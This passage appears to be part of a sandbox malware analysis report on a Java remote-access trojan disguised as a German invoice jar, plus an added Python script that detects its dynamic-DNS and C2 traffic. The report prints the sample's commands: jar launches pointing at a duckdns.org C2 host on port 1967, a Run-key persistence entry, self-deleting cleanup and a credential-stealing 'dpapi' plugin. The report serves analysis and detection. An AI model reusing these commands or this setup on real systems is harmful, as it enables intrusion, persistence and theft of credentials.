Source: java.exe, 00000003.00000002.2475316960.0000000014F57000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.0000000009974000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362358876.0000000014F30000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1768795989.0000000014F20000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1770854295.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014EF8000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1368038319.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000017.00000002.2304286299.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000003.00000003.1566322429.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2475357557.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363389065.0000000014F84000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363515756.0000000014F8B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363630443.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://null.oracle.com/
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com
Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: java.exe, 00000003.00000002.2475316960.0000000014F57000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.0000000009974000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362358876.0000000014F30000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1768795989.0000000014F20000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1770854295.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014F50000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014EF8000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: Avisierung vom 03.04.2025 Kundennummer 1084472.jar.12.dr | String found in binary or memory: http://www.allatori.com
Source: java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.allatori.com#
Source: 7za.exe, 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.allatori.comdlly
Source: java.exe, 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.allatori.como
Source: java.exe, 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.allatori.comu
Source: jna-platform-5.5.0.jar.3.dr | String found in binary or memory: http://www.apache.org/licenses/
Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: java.exe, 00000003.00000003.1537919401.0000000015637000.00000004.00000020.00020000.00000000.sdmp, jna-platform-5.5.0.jar.3.dr | String found in binary or memory: http://www.gnu.org/licenses/licenses.html
Source: java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.poweradmin.com0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_641019A0 lstrcmpA,RegisterRawInputDevices,GetKeyboardState,GetRawInputData,malloc,GetRawInputData,free,free,free,PostQuitMessage,DefWindowProcA,
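
No Suricata rule fired in this run, so the network side of this sample has to be caught from log-level heuristics: a DNS lookup for a dynamic-DNS name (jegjav.duckdns.org) followed by a TCP session to the resolved address on a non-standard port (128.90.145.126:1967), and an HTTP GET to ip-api.com/json/ sent by java.exe with a Chrome 73 User-Agent. The Python below is an added example for this page, not code from the report or from Joe Security: it applies those checks to DNS, HTTP and flow records constructed from the values above. The record layouts, the dynamic-DNS and IP-check provider lists beyond duckdns.org and ip-api.com, the common-port allow-list and the benign control rows (including the 203.0.113.10 address) are assumptions; attributing an HTTP request to a process name also assumes an endpoint-aware sensor, which a plain proxy log does not give you.

```python
"""Network-side checks for the indicators in the Networking section above.

Added example, not part of the sandbox report. Records are constructed from
the report's values; layouts and provider lists are assumptions.
"""
from collections import namedtuple

Finding = namedtuple("Finding", "src tag detail")

# The report shows only duckdns.org and ip-api.com; the other entries are
# well-known services of the same kind, added as an assumption.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")
IP_CHECK_HOSTS = ("ip-api.com", "api.ipify.org", "checkip.amazonaws.com", "ifconfig.me")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe")
# Assumed allow-list of destination ports a workstation normally talks to.
COMMON_PORTS = {53, 80, 123, 443, 445, 587, 853, 993, 3389, 8080, 8443}

# Constructed records: (client, query name, answer). First two rows are from the
# report; the third is a benign control with a TEST-NET address.
DNS_LOG = [
    ("192.168.2.4", "jegjav.duckdns.org", "128.90.145.126"),
    ("192.168.2.4", "ip-api.com", "208.95.112.1"),
    ("192.168.2.4", "www.example.com", "203.0.113.10"),
]
# Constructed HTTP records; the java.exe row reproduces the report's request.
HTTP_LOG = [
    {"src": "192.168.2.4", "host": "ip-api.com", "uri": "/json/", "process": "java.exe",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"},
    {"src": "192.168.2.4", "host": "www.example.com", "uri": "/", "process": "msedge.exe",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"},
]
# Constructed flows: (src, sport, dst, dport, proto). First row is the report's C2 session.
FLOWS = [
    ("192.168.2.4", 49716, "128.90.145.126", 1967, "tcp"),
    ("192.168.2.4", 49720, "203.0.113.10", 80, "tcp"),
]


def is_dyndns(qname):
    """True when the name is a dynamic-DNS hostname (suffix match on a label boundary)."""
    q = qname.lower().rstrip(".")
    return any(q == s or q.endswith("." + s) for s in DYNDNS_SUFFIXES)


def check_dns(records):
    out = []
    for src, qname, answer in records:
        q = qname.lower().rstrip(".")
        if is_dyndns(q):
            out.append(Finding(src, "dynamic_dns_lookup", f"{q} -> {answer}"))
        if q in IP_CHECK_HOSTS:
            out.append(Finding(src, "external_ip_check", q))
    return out


def check_http(records):
    out = []
    for r in records:
        # A browser User-Agent from a process that is not a browser is the
        # "known web browser user agent" signature seen from java.exe above.
        if "Mozilla/" in r["ua"] and r["process"].lower() not in BROWSERS:
            out.append(Finding(r["src"], "browser_ua_from_non_browser",
                               f'{r["process"]} -> {r["host"]}{r["uri"]}'))
        if r["host"].lower() in IP_CHECK_HOSTS:
            out.append(Finding(r["src"], "external_ip_check", f'{r["host"]}{r["uri"]}'))
    return out


def triage_network(dns, http, flows):
    """Correlate the three sources: a flow to an address that a dynamic-DNS name
    resolved to is flagged even if the port alone would not stand out."""
    findings = check_dns(dns) + check_http(http)
    dyn_ips = {answer for _, qname, answer in dns if is_dyndns(qname)}
    for src, _sport, dst, dport, proto in flows:
        if dport not in COMMON_PORTS:
            findings.append(Finding(src, "non_standard_port", f"{proto}/{dport} -> {dst}"))
        if dst in dyn_ips:
            findings.append(Finding(src, "flow_to_dyn_dns_host", f"{dst}:{dport}"))
    return findings


if __name__ == "__main__":
    for f in triage_network(DNS_LOG, HTTP_LOG, FLOWS):
        print(f.src, f.tag, f.detail)
```

The correlation step matters more than any single rule: port 1967 is unusual on its own, but tying the flow back to the duckdns.org answer is what distinguishes this session from a random high-port connection.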

System Summary

Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: java.exe PID: 7728, type: MEMORYSTR | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: java.exe PID: 5540, type: MEMORYSTR | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: java.exe PID: 4860, type: MEMORYSTR | Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\lib\paexec.exe, type: DROPPED | Matched rule: Detects PAExec based on strings Author: Sekoia.io
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: Process Memory Space: java.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: Process Memory Space: java.exe PID: 5540, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: Process Memory Space: java.exe PID: 4860, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
                    Source: C:\Users\user\AppData\Local\Temp\lib\paexec.exe, type: DROPPEDMatched rule: tool_paexec_strings author = Sekoia.io, description = Detects PAExec based on strings, creation_date = 2022-09-23, classification = TLP:CLEAR, version = 1.0, id = c48b897c-0d88-4fa9-b64b-0e14a38a62d7
                    Source: java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Gft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBp
                    Source: classification engineClassification label: mal84.troj.expl.evad.winJAR@36/25@5/2
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641014C0 GetLastError,FormatMessageA,LocalFree,
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeFile created: C:\Users\user\1967lock.fileJump to behavior
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:936:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
                    Source: C:\Windows\System32\7za.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar"
                    Source: C:\Windows\System32\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                    Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\System32\7za.exeSection loaded: 7z.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: winmm.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeSection loaded: cryptsp.dll
